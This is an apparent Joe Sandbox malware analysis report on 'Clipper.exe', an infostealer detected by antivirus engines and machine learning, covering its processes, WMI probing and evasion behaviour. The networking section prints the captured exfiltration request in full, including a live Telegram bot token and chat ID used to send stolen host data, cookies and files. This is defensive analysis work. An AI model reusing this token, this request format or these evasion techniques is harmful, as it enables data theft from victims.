Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Clipper.exe

Overview

General Information

Sample name:Clipper.exe
Analysis ID:1450354
MD5:a0a3146b324c02ed258e040e035bcec2
SHA1:4635d5ddba61b0e4ab04549b28c854f4193de364
SHA256:d6fa02a17eb8e18ae484e4af8462eb4362b1ab883e48a6a5c03c265dd867bf6f
Tags:exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Process Tree

  • System is w10x64
  • Clipper.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\Clipper.exe" MD5: A0A3146B324C02ED258E040E035BCEC2)
    • powershell.exe (PID: 4112 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Clipper.exe", ParentImage: C:\Users\user\Desktop\Clipper.exe, ParentProcessId: 5444, ParentProcessName: Clipper.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 4112, ProcessName: powershell.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Clipper.exeReversingLabs: Detection: 54%
Source: Clipper.exeVirustotal: Detection: 45%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.2% probability
Machine Learning detection for sample
Source: Clipper.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: Clipper.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior

Networking

barindex
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: global trafficHTTP traffic detected: POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%209U6K4TPK4%20(1280,%201024)%0AHWID:%208938522624742244%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Clipper.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=06ec5f61112c6801-34e39273c27dba2c-829713dddb1cab64-cc80a85d9fadfaa4content-length: 978765accept: */*host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: ipwho.is
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
Source: global trafficDNS traffic detected: DNS query: ipwho.is
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%209U6K4TPK4%20(1280,%201024)%0AHWID:%208938522624742244%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Clipper.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=06ec5f61112c6801-34e39273c27dba2c-829713dddb1cab64-cc80a85d9fadfaa4content-length: 978765accept: */*host: api.telegram.org
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: Clipper.exe, 00000000.00000003.2047238410.000001A2EBE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@4/14@2/2
Source: C:\Users\user\Desktop\Clipper.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Users\user\Desktop\Clipper.exeFile created: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Clipper.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Clipper.exe, 00000000.00000003.2048455422.000001A2EA119000.00000004.00000020.00020000.00000000.sdmp, Clipper.exe, 00000000.00000003.2046723501.000001A2EA112000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Clipper.exeReversingLabs: Detection: 54%
Source: Clipper.exeVirustotal: Detection: 45%
Source: unknownProcess created: C:\Users\user\Desktop\Clipper.exe "C:\Users\user\Desktop\Clipper.exe"
Source: C:\Users\user\Desktop\Clipper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Clipper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Clipper.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Clipper.exeStatic file information: File size 2269184 > 1048576
Source: Clipper.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x229600
Source: Clipper.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Clipper.exeStatic PE information: section name: UPX2
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\Clipper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2871Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2867Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exe TID: 3812Thread sleep time: -35000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6300Thread sleep count: 2871 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 2867 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1972Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\Desktop\Clipper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Clipper.exeThread delayed: delay time: 35000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
